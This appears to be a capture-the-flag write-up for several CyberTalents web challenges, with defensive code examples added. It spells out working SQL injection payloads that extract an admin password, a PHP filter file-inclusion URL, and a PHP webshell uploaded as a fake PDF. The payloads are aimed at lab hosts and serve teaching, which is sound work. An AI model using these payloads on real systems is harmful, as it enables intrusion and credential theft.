CYBERTALENTS WEB CHALLENGES WRITEUP
ADMIN HAS THE POWER
So when we open the link we are taken to a login page. I tried admin as username and admin as password but it didn't go through.
So I decided to take a look at the source code.
```
┌──(you㉿me)-[~]
└─$ curl http://wcamxwl32pue3e6m5p6v4ehxzg1rm2360kxlcg30-web.cybertalentslabs.com
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
<title>Admin Panel</title>
<!-- Bootstrap -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
<!-- TODO: remove this line , for maintenance purpose use this info (user:support password:x34245323)-->
</head>
<body>
<div class="container" style="padding-top :150px;">
<div class="row">
<div class="col-sm-6 col-sm-offset-3">
<form class="form-horizontal" method="post" action="">
<div class="form-group">
<label for="username" class="col-sm-2 control-label">Username</label>
<div class="col-sm-10">
<input name="username" type="text" class="form-control" id="username" placeholder="Username">
</div>
</div>
<div class="form-group">
<label for="password" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
<input name="password" type="password" class="form-control" id="password" placeholder="Password">
</div>
</div>
<div class="form-group">
<div class="col-sm-offset-2 col-sm-10">
<button type="submit" class="btn btn-default">Sign in</button>
</div>
</div>
</form>
</div>
</div>
</div>
<!-- jQuery (necessary for Bootstrap's JavaScript plugins) -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
<!-- Include all compiled plugins (below), or include individual files as needed -->
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script>
</script>
</body>
</html>
```
We see a user name and password (user:support, password:x34245323) so I gave it a shot.
So after doing so I logged in but didn't find any flag, but we are left a clue.
Here we see a clue that you need better privileges meaning user support has no admin rights. So I took a look at the cookies using the cookie editor extension and I saw a category called role and changed the role to admin.
Bang!! You get the flag.
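The weakness in this challenge is that the server believes a `role` cookie the client can edit. As an added example (not the challenge's code), the sketch below makes the role tamper-evident by signing it on the server; `SECRET_KEY`, `issue_role_cookie`, `read_role_cookie` and the `user|role|mac` layout are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

# Assumption: a per-deployment secret that never leaves the server.
SECRET_KEY = secrets.token_bytes(32)
KNOWN_ROLES = {"support", "admin"}


def _sign(payload: str) -> str:
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_role_cookie(username: str, role: str) -> str:
    """Build the cookie value after a successful login: user|role|mac."""
    if role not in KNOWN_ROLES or "|" in username:
        raise ValueError("invalid user or role")
    payload = f"{username}|{role}"
    return f"{payload}|{_sign(payload)}"


def read_role_cookie(cookie: str):
    """Return (username, role) if the MAC verifies, otherwise None."""
    try:
        username, role, mac = cookie.split("|")
    except ValueError:
        return None  # wrong number of fields, e.g. a bare "admin"
    expected = _sign(f"{username}|{role}")
    # Constant-time comparison; bytes avoid a TypeError on non-ASCII input.
    if not hmac.compare_digest(mac.encode(), expected.encode()):
        return None
    return (username, role) if role in KNOWN_ROLES else None


def naive_role(cookie_role: str) -> str:
    """What the challenge effectively does: trust the client's value."""
    return cookie_role


if __name__ == "__main__":
    cookie = issue_role_cookie("support", "support")
    edited = cookie.replace("support|support", "support|admin")
    print(read_role_cookie(cookie))   # accepted as issued
    print(read_role_cookie(edited))   # rejected: MAC no longer matches
```

Keeping the role in a server-side session keyed by a random identifier achieves the same result without exposing the role to the client at all.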
THIS IS SPARTA
In this challenge we find ourselves on a login page and now I try the common usernames and passwords but none of them seem to work. So I decided to look at the source code and there it was, an obfuscated JavaScript code, so I decided to decode it using lelinhtinh.github.io/de4js/ and I got the following;
So we see an array of words.
```
var _0xae5b = ["value", "user", "getElementById", "pass", "Cyber-Talent", " Congratz \x0A\x0A", "wrong Password"];
function check() {
    var _0xeb80x2 = document[_0xae5b[2]](_0xae5b[1])[_0xae5b[0]];
    var _0xeb80x3 = document[_0xae5b[2]](_0xae5b[3])[_0xae5b[0]];
    if (_0xeb80x2 == _0xae5b[4] && _0xeb80x3 == _0xae5b[4]) {
        alert(_0xae5b[5]);
    } else {
        alert(_0xae5b[6]);
    }
}
```
From this code we can say the following;
```
// Body of check() with the array lookups substituted in
var _0xeb80x2 = document.getElementById("user").value;
var _0xeb80x3 = document.getElementById("pass").value;
if (_0xeb80x2 == "Cyber-Talent" && _0xeb80x3 == "Cyber-Talent") {
    alert(" Congratz \x0A\x0A");
} else {
    alert("wrong Password");
}
```
So from here, we see that the username and password should be Cyber-Talent.
When we log in with these credentials we see a pop-up containing the flag.
SHARE THE IDEAS
When we click we are taken to a page where we have to log in so that we can be able to comment.
I created an account and logged in. I typed a and it was added to the comments. I added an ' and I got an error and noticed the site was vulnerable to SQL injection. From the error given I noticed it used SQLite.
So to get the version of SQLite being used the following payload worked;
```
a' || (select sqlite_version()));--
```
After that, I wanted to know what tables are in the DB, so I ran the following;
```
a' || (select sql from sqlite_master));--
```
The above showed the following results;
After seeing this, coming up with the final command to give the password was easy;
```
a' || (select password from xde43_users where role="admin"));--
```
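Why the comment field behaves this way, and what fixes it, shown as an added example that is not the challenge's code: the same insert written with string concatenation and with a bound parameter, run against an in-memory SQLite database. The `comments` table and the function names are assumptions; the payload is the version query from the write-up.

```python
import sqlite3

PAYLOAD = "a' || (select sqlite_version()));--"  # taken from the write-up


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the comment store (schema is an assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE comments (body TEXT)")
    return db


def add_comment_vulnerable(db: sqlite3.Connection, text: str) -> None:
    # String concatenation: a quote in `text` ends the literal and the
    # rest of the input is parsed as SQL.
    db.execute("INSERT INTO comments (body) VALUES ('" + text + "')")


def add_comment_safe(db: sqlite3.Connection, text: str) -> None:
    # Bound parameter: `text` is always data, never SQL.
    db.execute("INSERT INTO comments (body) VALUES (?)", (text,))


def stored(db: sqlite3.Connection) -> list:
    return [row[0] for row in db.execute("SELECT body FROM comments")]


def quote_breaks_query(add_comment) -> bool:
    """True if a lone single quote makes the insert fail with a SQL error."""
    try:
        add_comment(make_db(), "'")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    for add in (add_comment_vulnerable, add_comment_safe):
        db = make_db()
        add(db, PAYLOAD)
        print(add.__name__, stored(db), quote_breaks_query(add))
```

With the concatenated query the stored comment is `a` followed by the engine version; with the bound parameter the payload is stored verbatim as text and a lone quote no longer raises an error.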
DARK PROJECT
On clicking the link we go to a website that at first looks so normal. On clicking the contact, about and project you notice that nothing is changing.
So I decided to look at the link and noticed something very fishy;
```
http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=about
```
So the payload that works is the PHP base64-encode filter and it worked like magic.
```
http://wcamxwl32pue3e6m14nzyr6cn3kmm2360kxlcg30-web.cybertalentslabs.com/index.php?home=php://filter/convert.base64-encode/resource=index
```
Since it is a base64 string, I copied the base64-encoded text, went to CyberChef and decoded it.
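From the defender's side, a request like the one above stands out in an access log because a page-name parameter should never carry a `scheme://` value. The following added example (not part of the challenge) flags such requests; the log lines are constructed, and the `home` parameter name comes from the URL in the write-up.

```python
import re
from urllib.parse import parse_qsl

# Client address and request target from a combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)  # any scheme:// prefix
PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,32}")        # assumed shape of a page id

# Constructed sample log lines (addresses, times and sizes are made up).
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?home=about HTTP/1.1" 200 5120
203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?home=php://filter/convert.base64-encode/resource=index HTTP/1.1" 200 9211
203.0.113.8 - - [01/Jan/2024:10:00:10 +0000] "GET /index.php?home=contact HTTP/1.1" 200 4870
203.0.113.9 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?home=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dindex HTTP/1.1" 200 9211
"""


def classify(value: str) -> str:
    """Label a decoded parameter value."""
    if SCHEME.match(value):
        return "stream wrapper"
    if not PAGE_NAME.fullmatch(value):
        return "unexpected characters"
    return "ok"


def suspicious_requests(log_text: str, param: str = "home") -> list:
    """Return (client, decoded value, reason) for each bad `param` value."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = target.partition("?")[2]
        # parse_qsl percent-decodes, so encoded variants are caught too.
        for key, value in parse_qsl(query, keep_blank_values=True):
            reason = classify(value)
            if key == param and reason != "ok":
                hits.append((client, value, reason))
    return hits


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

The same `classify` check, applied to the parameter before it is used to select a file, is the allow-list validation that prevents the inclusion in the first place.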
JOIN TEAM
This challenge was a bit tricky but after doing some research I was able to come up with the solution.
We can see that there is a place to upload files but only .pdf files are allowed.
So I did the following;
```
┌──(you㉿me)-[~]
└─$ echo "<?php system('ls'); ?>" >test.txt
┌──(you㉿me)-[~]
└─$ mv test.txt test.pdf
```
I uploaded the test.pdf and magic!! It was successfully uploaded.
So I clicked on the test.pdf and I noticed something at the URL...
I saw the /data/test.pdf so I copied it as follows;
```
data/test.pdf
http://wcamxwl32pue3e6m86dv92kb4zlgm2360kxlcg30-web.cybertalentslabs.com/index.php?jobs
```
I added data/test.pdf to the URL and the ls command was executed.
I edited the PHP code as follows;
```
<?php system('cat index.php'); ?>
```
After that, we get the flag.
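The upload succeeded because only the file name was checked. As an added example (not the challenge's code), the check below looks at the content as well and lets the server choose the stored name; the size limit, function names and sample byte strings are assumptions, and a content check does not replace keeping uploads out of any path the application can include.

```python
import secrets

PDF_MAGIC = b"%PDF-"
MAX_BYTES = 5 * 1024 * 1024  # assumed upload size limit

# Constructed samples: the file made in the write-up, and a minimal PDF shell.
WRITEUP_FILE = b"<?php system('ls'); ?>\n"
MINIMAL_PDF = b"%PDF-1.4\n1 0 obj\n<<>>\nendobj\ntrailer\n<<>>\n%%EOF\n"


def check_pdf_upload(filename: str, data: bytes):
    """Return (ok, reason). The client's file name is never enough on its own."""
    if not filename.lower().endswith(".pdf"):
        return False, "extension is not .pdf"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(PDF_MAGIC):
        return False, "content does not start with %PDF-"
    if b"%%EOF" not in data[-1024:]:
        return False, "missing %%EOF trailer"
    return True, "ok"


def storage_name() -> str:
    """Server-chosen name, so the client's file name never reaches the disk."""
    return secrets.token_hex(16) + ".pdf"


if __name__ == "__main__":
    print(check_pdf_upload("test.pdf", WRITEUP_FILE))
    print(check_pdf_upload("cv.pdf", MINIMAL_PDF), storage_name())
```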
I AM A LEGEND
In this challenge, we are given a login page. I tried the default credentials but couldn't log in.
I took a look at the source code and I saw obfuscated JSFuck code.
Look at the link below and it'll shed some light on how to decode the JSFuck ;).
WEIRD BLOQ
So this was some weird blog as stated. I went to the search bar and tried searching for a random word but it didn't show any results. I thought for a while and decided to search for the following;
```
a || b
```
After searching for it, the following was displayed.
I fuzzed the URL and I got a robots.txt file. I opened the robots.txt file and got a git.phps which was a downloadable file that contained the source code;
After minutes of research I finally found the payload that could get the flag.
```
h%a' uNion(sElect(t.cOlumn_name)from(sElect(cOlumn_name),(table_namE)from(infOrmation_schema.COLUMNS)having(table_namE)=('FL@g'))t)#
```
More challenges on the way ;).